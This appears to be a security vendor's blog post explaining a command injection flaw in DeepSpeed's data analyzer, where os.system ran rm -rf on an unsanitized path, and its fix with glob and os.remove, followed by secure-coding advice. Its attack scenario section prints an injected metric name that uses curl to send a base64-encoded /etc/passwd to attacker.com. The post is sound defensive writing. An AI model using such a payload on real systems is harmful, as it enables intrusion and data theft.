Back to Blog
critical SEVERITY9 min read

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

A critical command injection vulnerability was discovered in DeepSpeed's `data_analyzer.py`, where an `os.system()` call directly interpolated an unsanitized file path variable into a shell command string. An attacker who could influence dataset configuration or file paths could execute arbitrary shell commands on the host machine. The fix replaces the dangerous shell invocation with safe, Python-native file operations that never touch a shell interpreter.

O
By orbisai0security
May 28, 2026

Command Injection via os.system() in DeepSpeed's Data Analyzer: A Critical Fix

Introduction

Machine learning infrastructure is not immune to classic security vulnerabilities. In fact, as ML frameworks grow in complexity and adoption, they become increasingly attractive targets — and increasingly likely to carry the same security pitfalls found in any large software project. This post examines a critical command injection vulnerability discovered and patched in DeepSpeed, Microsoft's popular deep learning optimization library used by organizations training large-scale models worldwide.

The vulnerability lived in a single line of Python code. One call to os.system(). One unsanitized variable. And the potential for full arbitrary command execution on any machine running the affected data pipeline.

If you write Python code that touches the filesystem, spawns subprocesses, or processes user-supplied paths — this one is for you.


The Vulnerability Explained

What Went Wrong

Inside deepspeed/runtime/data_pipeline/data_sampling/data_analyzer.py, the init_metric_results method needed to clean up old metric files before creating new ones. The original implementation did this:

# VULNERABLE CODE — DO NOT USE
metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

At first glance, this looks like a harmless cleanup routine. But there are two deeply problematic choices here working together:

  1. os.system() invokes a shell interpreter (/bin/sh on Unix). This means the entire string is passed to the shell, which will happily interpret metacharacters like ;, |, &&, `, $(), and &.

  2. metric_to_sample_fname is derived from user-supplied input — specifically from dataset configuration values or file paths provided at runtime. There is no sanitization, escaping, or validation of this value before it is embedded in the shell command string.

How Could It Be Exploited?

The attack surface opens wherever a user or an external system can influence the metric_save_path or metric_name values passed into the data pipeline. In practice, these values often come from:

  • Dataset configuration files (YAML/JSON)
  • Command-line arguments
  • Programmatic API calls from orchestration systems
  • Shared storage paths in multi-tenant training environments

An attacker who controls either of these values can craft a payload that breaks out of the intended rm -rf command and executes arbitrary shell instructions.

Attack Scenario

Imagine a multi-tenant ML platform where users submit training jobs with their own dataset configurations. A malicious user submits the following as their metric_name:

foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar

The resulting shell command becomes:

rm -rf /data/metrics/foo; curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64); echo bar*

The shell executes all three commands in sequence:
1. ✅ Removes the metric files (the intended behavior)
2. 🚨 Exfiltrates /etc/passwd to an attacker-controlled server
3. 🚨 Executes any additional payload the attacker desires

In a cloud training environment, this could mean:
- Credential theft — reading cloud provider credentials from ~/.aws/credentials or instance metadata endpoints
- Data exfiltration — stealing training datasets, model weights, or proprietary code
- Lateral movement — using the compromised node as a pivot point into internal networks
- Denial of service — destroying training checkpoints or corrupting datasets

Even without a fully adversarial scenario, a accidentally malformed path containing spaces or special characters could cause silent failures or unintended file deletions — the rm -rf making any mistake potentially catastrophic.

Why os.system() Is Dangerous

The Python documentation itself warns against os.system() for exactly this reason. When you pass a string to os.system(), you are essentially doing this:

/bin/sh -c "<your string here>"

The shell is a powerful interpreter. Its job is to find and execute commands, expand variables, and evaluate expressions. That power is exactly what makes it dangerous when you feed it untrusted data.

This vulnerability class is well-documented:
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- OWASP A03:2021: Injection
- CVSS Base Score: Typically 9.0+ (Critical) when user input reaches os.system() without sanitization


The Fix

What Changed

The fix is elegant in its simplicity: eliminate the shell entirely. Instead of asking a shell to delete files, use Python's own filesystem APIs, which operate directly on file paths without any shell interpretation.

Before (Vulnerable):

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
os.system(f"rm -rf {metric_to_sample_fname}*")

After (Fixed):

import glob

metric_to_sample_fname = f"{metric_save_path}/{metric_name}_metric_to_sample"
for _f in glob.glob(f"{glob.escape(metric_to_sample_fname)}*"):
    os.remove(_f)

Why This Fix Works

Let's break down each component of the fix:

1. glob.escape() — Neutralizing Special Characters

glob.escape(metric_to_sample_fname)

glob.escape() escapes all special glob characters (*, ?, [, ]) in the input string. This ensures that if metric_to_sample_fname contains any characters that glob would normally treat as wildcards or special tokens, they are treated as literal characters instead.

This is the path sanitization that was entirely absent in the original code.

2. glob.glob() — Safe Pattern Expansion

glob.glob(f"{glob.escape(metric_to_sample_fname)}*")

The glob.glob() function expands the file pattern and returns a list of matching file paths. Critically:
- It never invokes a shell
- It operates purely in Python's filesystem layer
- It returns concrete, resolved file paths — no further interpretation occurs

The trailing * (outside the escaped portion) is intentional: it matches files like metric_to_sample_0, metric_to_sample_1, etc., which is the original intent of the cleanup.

3. os.remove() — Direct File Deletion

os.remove(_f)

os.remove() deletes a single file by path. It makes a direct syscall — no shell, no string interpolation, no command parsing. Each file returned by glob.glob() is deleted individually and safely.

The Security Improvement at a Glance

Property Before (os.system) After (glob + os.remove)
Shell invoked? ✅ Yes ❌ No
Input sanitized? ❌ No ✅ Yes (glob.escape)
Metachar risk? 🚨 Critical ✅ None
Behavior on bad input Arbitrary execution Safe failure / no match
Intent preserved? ✅ Yes ✅ Yes

The fix is a zero-functionality-change security improvement: the code does exactly what it always intended to do — clean up old metric files — but now does so without any possibility of shell injection.


Prevention & Best Practices

This vulnerability follows a pattern that appears regularly in Python codebases. Here's how to prevent it and detect it in your own projects.

1. Never Use os.system() with Variable Input

The rule is simple: if the string passed to os.system() contains any variable, it is potentially dangerous. Even variables you believe are safe can be influenced by upstream inputs you haven't considered.

# ❌ Always dangerous
os.system(f"rm -rf {some_path}*")
os.system("ls " + user_input)

# ✅ Use Python's filesystem APIs instead
import shutil, glob, os
for f in glob.glob(f"{glob.escape(some_path)}*"):
    os.remove(f)

2. Prefer subprocess with List Arguments When You Must Spawn Processes

If you genuinely need to run an external command, use subprocess with a list of arguments (not a shell string) and shell=False (the default):

import subprocess

# ❌ Still vulnerable — shell=True defeats the purpose
subprocess.run(f"rm -rf {path}*", shell=True)

# ✅ Safe — no shell, arguments passed directly to execve
subprocess.run(["rm", "-rf", path], shell=False)

When arguments are passed as a list, they go directly to the OS execve syscall. The shell is never involved, so metacharacters are never interpreted.

3. Use glob.escape() Whenever Building Glob Patterns from External Input

import glob

# ❌ User input could contain *, ?, [, ]
pattern = f"{user_supplied_path}/*.log"

# ✅ Escape the user-supplied portion
pattern = f"{glob.escape(user_supplied_path)}/*.log"

4. Prefer Python-Native APIs Over Shell Commands

For common filesystem operations, Python's standard library has you covered without ever needing a shell:

Shell Command Python Equivalent
rm -rf path shutil.rmtree(path)
rm file os.remove(file)
rm file* glob.glob() + os.remove()
cp src dst shutil.copy2(src, dst)
mv src dst shutil.move(src, dst)
mkdir -p path os.makedirs(path, exist_ok=True)
ls path os.listdir(path)

5. Validate and Sanitize File Paths

When file paths originate from user input, configuration files, or external systems, validate them before use:

import os

def safe_metric_path(base_dir: str, metric_name: str) -> str:
    # Allow only alphanumeric characters, hyphens, and underscores
    import re
    if not re.match(r'^[a-zA-Z0-9_\-]+$', metric_name):
        raise ValueError(f"Invalid metric name: {metric_name!r}")

    # Resolve and confirm the path stays within the expected directory
    full_path = os.path.realpath(os.path.join(base_dir, metric_name))
    if not full_path.startswith(os.path.realpath(base_dir)):
        raise ValueError("Path traversal detected")

    return full_path

6. Static Analysis Tools

Several tools can automatically detect os.system() calls and other dangerous patterns in Python code:

  • Bandit — Python-specific security linter. The B605 rule flags os.system() calls directly.
    bash bandit -r your_project/ -t B605,B607
  • Semgrep — Powerful pattern-matching tool with rules for command injection.
  • CodeQL — GitHub's semantic code analysis engine with taint-tracking for injection vulnerabilities.
  • OrbisAI Security — AI-powered scanner that detected this exact vulnerability automatically.

Adding these tools to your CI/CD pipeline means vulnerabilities like this one are caught before they ever reach production.

7. Security Standards References


Conclusion

A single call to os.system() with an unsanitized variable is all it takes to turn a routine file cleanup into a critical security vulnerability. The lesson here isn't that the original developer was careless — it's that certain APIs are inherently dangerous when combined with variable input, and developers need to internalize which APIs those are.

The fix demonstrates something important: the most secure code is often the simplest code. Replacing a shell command with native Python filesystem operations didn't require complex cryptography, elaborate input validation, or architectural changes. It required recognizing that the shell was never necessary in the first place, and removing it entirely.

Key takeaways:

  • 🚫 Avoid os.system() — it invokes a shell, and shells interpret metacharacters
  • Use Python-native filesystem APIs (os.remove(), shutil, pathlib) for file operations
  • 🔒 Use glob.escape() when building glob patterns from external input
  • 🔍 Run Bandit or Semgrep in your CI pipeline to catch these patterns automatically
  • 📋 Treat all external input as untrusted — including configuration files and dataset paths

Security vulnerabilities in ML infrastructure carry the same risks as vulnerabilities anywhere else — and sometimes higher, given the sensitive datasets and credentials that training environments typically handle. Secure coding practices aren't just for web applications. They belong in every line of code you ship.


This vulnerability was automatically detected and patched by OrbisAI Security. Automated security scanning helps catch issues like this before they reach production.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #7994

Related Articles

high

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

A high-severity vulnerability was discovered in PaddleOCR's deployment configuration where model download URLs were specified using unencrypted `http://`, exposing users to man-in-the-middle attacks that could allow an attacker to intercept and replace model files with malicious ones. The fix upgrades all model download URLs to use `https://`, ensuring encrypted transmission and integrity of the downloaded files. This change is a critical security baseline for any application that downloads bina

critical

Shell Injection via os.system(): How a Single Line of Code Can Compromise Your System

A critical OS command injection vulnerability (CWE-78) was discovered and patched in `voice.py`, where user-controlled input was interpolated directly into a shell command string passed to `os.system()`. An attacker who could influence the `device` variable — through a config file, environment variable, or any external input — could execute arbitrary system commands with the full privileges of the running process. The fix replaces the dangerous `os.system()` calls with Python's `subprocess.run()

high

Shell Injection via Unsafe String Concatenation in gRPC Command Generation

A high-severity shell injection vulnerability was discovered in `src/RtlJaguarDevice.cpp`, where user-controlled values from API responses were directly interpolated into gRPCurl command strings without proper shell escaping. An attacker who controls API response data could inject shell metacharacters, causing arbitrary command execution when a user pastes and runs the generated command. The fix applies proper shell escaping to all user-controlled values before they are included in command strin

high

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

A high-severity shell injection vulnerability was discovered and patched in a distributed server's gRPCurl command generation logic, where user-controlled values from API responses were directly interpolated into shell command strings without proper escaping. An attacker who can influence API response data — such as headers, endpoints, or payloads — could inject shell metacharacters that execute arbitrary commands when a user pastes and runs the generated command. This fix eliminates the risk by

high

Shell Injection via gRPCurl Command Generation: A Hidden Android Threat

A high-severity shell injection vulnerability was discovered and fixed in the HeadUnit Revived Android project, where user-controlled API response values were unsafely interpolated into gRPCurl command strings. An attacker could craft malicious headers, endpoints, or data payloads containing shell metacharacters that, when the generated command is pasted and executed, would run arbitrary commands on the victim's machine. The fix introduces proper shell escaping and broadcast intent protection to

critical

Heap Buffer Overflow in Audio Ring Buffer: How a Missing Bounds Check Could Crash Your App

A critical heap buffer overflow vulnerability was discovered in `audio_backend.c`, where the audio ring buffer's `memcpy` operations lacked bounds validation before writing PCM data. Without checking that incoming data sizes fell within the allocated buffer's capacity, a maliciously crafted audio file could corrupt adjacent heap memory, potentially enabling arbitrary code execution. The fix adds a concise pre-flight validation guard that rejects out-of-range write requests before any memory oper